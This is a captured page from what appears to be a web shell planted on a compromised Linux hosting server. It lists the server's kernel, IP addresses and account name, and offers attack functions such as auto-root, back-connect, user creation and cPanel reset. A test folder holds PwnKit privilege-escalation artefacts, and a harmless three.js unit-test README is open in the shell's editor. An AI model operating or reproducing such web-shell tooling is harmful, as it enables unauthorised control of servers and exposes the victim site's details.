Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.133.118.144
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
HRD-Test /
test /
unit /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
README.md
1.13
KB
-rw-r--r--
UnitTests.html
568
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
three.source.unit.js
11.29
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
## Setup - Execute `npm install` from the root folder ## Run You can run the unit tests in two environments: - Node.js: Execute `npm run test-unit` from the root folder - Browser: Execute `npx servez -p 8080 --ssl` (or run any other local web sever) from the root folder and access `https://localhost:8080/test/unit/UnitTests.html` in a web browser. See [Installation](https://threejs.org/docs/#manual/introduction/Installation) for more information. ## Notes A small number of tests can only be run in a browser environment. For browser tests, futher changes to the library will not be reflected until the page is refreshed. ## Troubleshooting When adding or updating tests, the most common cause of test failure is forgetting to change `QUnit.todo` to `QUnit.test` when the test is ready. An error that indicates "no tests were found" means that an import statement could not be resolved. This is usually caused by a typo in the import path. ## Debugging To debug a test, add `debugger;` to the test code. Then, run the test in a browser and open the developer tools. The test will stop at the `debugger` statement and you can inspect the code.
Close